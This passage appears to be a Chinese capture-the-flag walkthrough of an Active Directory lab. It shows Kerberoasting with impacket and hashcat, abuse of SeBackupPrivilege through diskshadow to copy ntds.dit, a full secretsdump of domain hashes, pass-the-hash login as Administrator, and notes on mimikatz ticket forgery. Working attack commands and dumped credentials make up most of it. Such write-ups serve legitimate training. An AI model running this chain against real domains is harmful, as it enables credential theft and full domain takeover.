* SHA1 : bca5a1ee3fd9c6830ac76f9c541b432fa4554477
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
我们可以看到
XR-0923$ 的ntlm哈希看SPN能找到一个tianjing用户
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':ab6f563648a1c89f8ab77339b9aadba2' -dc-ip 172.22.14.11
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':ab6f563648a1c89f8ab77339b9aadba2' -dc-ip 172.22.14.11 -request-user tianjing
把hash抓下来
──(root㉿kali)-[~]
└─# proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':ab6f563648a1c89f8ab77339b9aadba2' -dc-ip 172.22.14.11 -request-user tianjing
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 39.107.115.191:5555 ... 172.22.14.11:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------------------------------------------------------- -------------------------- --------- ----------
TERMSERV/xr-0923.xiaorang.lab tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 06:25:11.564883 <never>
WWW/xr-0923.xiaorang.lab/IIS tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 06:25:11.564883 <never>
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 39.107.115.191:5555 ... 172.22.14.11:88 ... OK
[proxychains] Strict chain ... 39.107.115.191:5555 ... 172.22.14.11:88 ... OK
[proxychains] Strict chain ... 39.107.115.191:5555 ... 172.22.14.11:88 ... OK
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$2f3d122af4018f0807bbb078b76192bb$48155327d32db389bb8a682830769cf9941b59b2f4484ce0cf42caa31d6ad70b47604b767f738f2baca664f6f517bef340d6dba681dc5e16e83ff4803b2f7838c75057ae657e92c95a9cb53dbe2130d15f11a907d466b0097f17176194ab52ad8456dc05e526f3f5eb1aea718b379586574516eaf7c7045c1beccdf049ae76d90638ad66eadbc1f64d7fb2b59e133c8ad9e1b326d705b1d0051ce59e1aadf98c8b8efce54ddc0d774329a13beac95847859c7781c21e599cc03a647e90ba85591396d97e0bf181713b92b74ea39822850bc58ef4ab1cb413c2b2cae4c72ca0fc0d4cbafac508110eec0ccdaf9bda87ddf0e998d38b87d96e975c9db37febffbe10b493bf4682f59f41f26bad93a50f6709bb2f44ea204b284b330cc81bdab2729d39ffbe0459bf4ec8e1f31acef1dc87518be8badfa253e27af007593c92f073f4f49314cbf5c083fdc73d1baea49576ec26ad1226a2beab114d7f8b501ed689ddd44532c8b5f9d1b056c3ff51c6ed4211cd66c52460548aab37988990b9a6d47552ecf292ef62371aeeb8fd5d3859d71620fe1562f5df0eaa7f4410658e30888249d60a1c56caeafbcf6924b15ffa2be61b0abf1407431b6dc26a9b5b528e042879c3f5df92031e4a96a38baaa2899e5690dcd4aeae33c482545ac9b14a36c0afc097a403cca28aede0d3e790ac71c90680b62e8edb18a4a145651a8ff8b868e082d5cd19945c22dee8322d7b558eed5d93f17a06a2c1d3295b626c9ae5e2c464b517810c680f43ddd89dd521545e47506590c5ecaacd4b40ffd387f1fb9aaf1a7accd20795319b87e6130b9938757859a2b5f5bd4a023885ed4cc1f599cbc99ad11eee61c810e75d9b0427acb0b0d9cd0ea73f1b5652e53022cac8bf0619937df64cd1a17969dc4935f97dfaa322adcd4b846324925458586f62909c0bdd3e2d9ca9df3de6fb4ac1e1732031521266efc275fe1dc798a0243d7f3a4e415b82f31011a432ba0178724e45f9395e0595cbf8df090b55bd15c31565b2b849038258b5c226ccb5739fa163461542fd310119101952208a5d24fa5cb8006e21f87f1fdf379731fb5ff5e45f5a51493e345ebef68a4b2cf087b350884ff5929884040cdd288506b7e267ec9d274dfe52498a7cb71add86d710e930d914258d41284605c44ea0ca564e98989f15f7a580d437fe4f496c0f32a628979c9e162ec4d53c9bcdf3a6ac58dc0f2228fee9c07550dd69d7abf28238f11bc8905e419ba8f846b1dce72dabdb3066ac7a927f3ad368a52e8878eeaa0953374bf537c7636e3de2d7044ec5deb4899c7a12606773280e3ca80134b18c58a71418be522f91b534386dee6ba106341b29cbd3e3823033b90e5bbbe0ca6061b7ff42d33a101be896537ac8263e8ec033c33e66b0d9b480065c268e5142ba8ea7de0b4e82c2d2da7fe46f02676d0b7994727c189a151196143dda7cb357c9
利用hashcat爆破,没解压字典的记得解压一下
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force
tianjing:DPQSXSXgh2
再利用evil-winrm连上去
proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
看权限
存在 SeBackupPrivilege 和 SeRestorePrivilege 特权
SeBackupPrivilege
👉 允许用户 读取所有文件,即使文件 ACL(访问控制列表)不允许
因为系统认为这是“备份”需要的能力
在渗透中可能被用来直接读取敏感文件(例如 SAM 数据库)
SeRestorePrivilege
👉 允许用户 写入/覆盖文件,即使正常权限不允许
常用于“还原”数据
滥用时可覆盖系统文件,植入后门
有备份以及还原文件或目录的权限,可以卷影拷贝然后下载ntds.dit文件
本地创一个raj.dsh,写入
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
/*创建系统盘 C 的卷影副本
把它挂载成一个可访问的盘符(Z盘)
从这个快照里复制被锁定的敏感文件(比如 SAM、SYSTEM、SECURITY)*/
用unix2dos raj.dsh转化格式,把本地的raj.dsh上传上去
mkdir test
cd test
upload raj.dsh
卷影拷贝
diskshadow /s raj.dsh
复制到到当前目录,也就是我们创建的这个test目录
RoboCopy /b z:\windows\ntds . ntds.dit
将其下载下来
download ntds.dit
接下来下载system
reg save HKLM\SYSTEM system
download system
将拿下的system和ntds.dit进行解密
impacket-secretsdump -ntds ntds.dit -system system local
┌──(root㉿kali)-[~]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x4d1852164a0b068f32110659820cd4bc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 8cca939cb8a94a304d33209b41a99517
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XR-DC$:1000:aad3b435b51404eeaad3b435b51404ee:28b508bccbc765e1779134fc309ee161:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4b2afb57dd0833ee9ed732ea89c263a3:::
XR-0923$:1103:aad3b435b51404eeaad3b435b51404ee:8519c5a89b2cd4d679a5a36f26863e5d:::
tianjing:1104:aad3b435b51404eeaad3b435b51404ee:c8252441ad9f475d629865fe86b3aecd:::
liyuying:1106:aad3b435b51404eeaad3b435b51404ee:4e77dc688f87c4ebbbe1da95931d25d1:::
wangyuying:1107:aad3b435b51404eeaad3b435b51404ee:f09d261da7841e97bc25e5a95833ee4a:::
yangguiying:1108:aad3b435b51404eeaad3b435b51404ee:93242254318fe496c9d03908c0ab7440:::
zhoumin:1109:aad3b435b51404eeaad3b435b51404ee:fad94b7c69cdbc4376fb17dc78cc858e:::
chenyun:1110:aad3b435b51404eeaad3b435b51404ee:8e41a10b056df5d0c53e8140d4790b21:::
chenmei:1111:aad3b435b51404eeaad3b435b51404ee:d53b17e5763bb9f028211044a32a9267:::
huangmin:1112:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
jiangcheng:1113:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
huanggang:1114:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
machao:1115:aad3b435b51404eeaad3b435b51404ee:9a504875c8fc24ea22c3a27152ed3273:::
liguihua:1119:aad3b435b51404eeaad3b435b51404ee:88c540dbe639451a04a5183ea0e0af0d:::
wangfang:1120:aad3b435b51404eeaad3b435b51404ee:0bf4fdbc625a4435868eb71dbc8307b3:::
liguizhi:1122:aad3b435b51404eeaad3b435b51404ee:51c00743fa6f148926694c830112ae33:::
wangyulan:1123:aad3b435b51404eeaad3b435b51404ee:9b57eb71d89ba4003558cc451c3393ef:::
huachunmei:1126:aad3b435b51404eeaad3b435b51404ee:75fa801c8a5bedcb2b81c4f792ce1024:::
jiadongmei:1127:aad3b435b51404eeaad3b435b51404ee:6ac97d0534c99743bfa52ed5584e916b:::
liguilan:1128:aad3b435b51404eeaad3b435b51404ee:c337e57ca73c99e1eb1da443425da58b:::
yuxuecheng:1129:aad3b435b51404eeaad3b435b51404ee:cfc4835a206d618f1d7ea2bc22cc49ac:::
lixiuying:1130:aad3b435b51404eeaad3b435b51404ee:2e73b44dce942ffe682bb3b4052caa95:::
liguizhen:1134:aad3b435b51404eeaad3b435b51404ee:63d1d7be0b04f6b5b5336434a3d5a518:::
chenjianhua:1135:aad3b435b51404eeaad3b435b51404ee:5e121c3d4d259f35917c9c666c7c3650:::
yangjuan:1138:aad3b435b51404eeaad3b435b51404ee:68868390d1183fb671a371e0929b8a54:::
lidan:1139:aad3b435b51404eeaad3b435b51404ee:4dea8e760936a0d96f906edc4a470add:::
··························
得到管理员的hash,然后我们用evil-winrm去连接
看到RID:500(域管理员的标准 RID) NT Hash可用于横向移动
成功拿下域控
proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
成功拿到最后一个flag
工具&命令介绍
evil-winrm:它是用 Ruby 写的,专门用来在 获得 Windows 凭据或哈希 之后,通过 WinRM 协议直接远程连接 Windows 主机
主要作用:
远程交互式 Shell
- 当你有一台 Windows 机器的用户名和密码/NTLM 哈希时,可以直接使用 evil-winrm 获取一个交互式命令行(类似 SSH)
- 可以上传并运行 PowerShell 脚本或命令
- 方便在目标系统上进一步操作(例如横向移动、信息收集等)
文件上传/下载
- 提供内置的上传、下载功能,可以很方便地传输工具或导出数据
凭据利用
- 不仅支持明文密码,还支持 NTLM 哈希或 Kerberos 票据,配合哈希传递攻击使用
impacket-GetUserSPNs 的功能是:
1. 枚举域用户的 SPN(Service Principal Names)
- SPN 用来标识域内服务账户和它们运行的服务
- 比如某个 SQL Server 服务可能用一个域用户账户来运行,它就会有对应的 SPN
2. 请求 Kerberos 服务票据 (TGS)
- 通过 Kerberos 协议,任何人都可以请求某个服务账户的 TGS(不需要管理员权限)
- 如果该服务账户的密码比较弱,就有可能从 TGS 里暴力破解出明文密码
3. 实现 Kerberoasting 攻击
- 这是一个经典的域内横向攻击技巧
- 攻击者使用 `GetUserSPNs.py` 提取所有可用的服务票据,保存为哈希
- 然后离线用工具(如 Hashcat)暴力破解,拿到服务账户的明文口令
- 因为这些服务账户往往有高权限(例如数据库服务或管理员级别账号),成功率和收益都很高
ODAT:它是一个开源的 渗透测试工具,专门针对 Oracle 数据库 的安全测试
Mimikatz 的核心功能就是 提取、操纵和利用 Windows 系统中的凭据
凭据提取 (Credential Dumping)
从内存(LSASS 进程)中直接读取用户的 明文密码、NTLM 哈希、Kerberos 票据
sekurlsa::logonpasswords
Pass-the-Hash (哈希传递攻击)
不需要明文密码,直接使用 NTLM 哈希来认证远程系统
Pass-the-Ticket (票据传递攻击)
使用窃取的 Kerberos TGT/TGS 票据直接访问服务,而不需要密码
Golden Ticket (黄金票据)
伪造 Kerberos 票据,获得域管理员权限
即使密码修改也能持续控制域,属于持久化攻击手法
Silver Ticket (白银票据)
针对单个服务(如 SQL Server)的 Kerberos 票据伪造
凭据导出/注入
导出 LSA Secrets、本地存储的密码、缓存凭据等
注入凭据到当前会话,实现权限提升
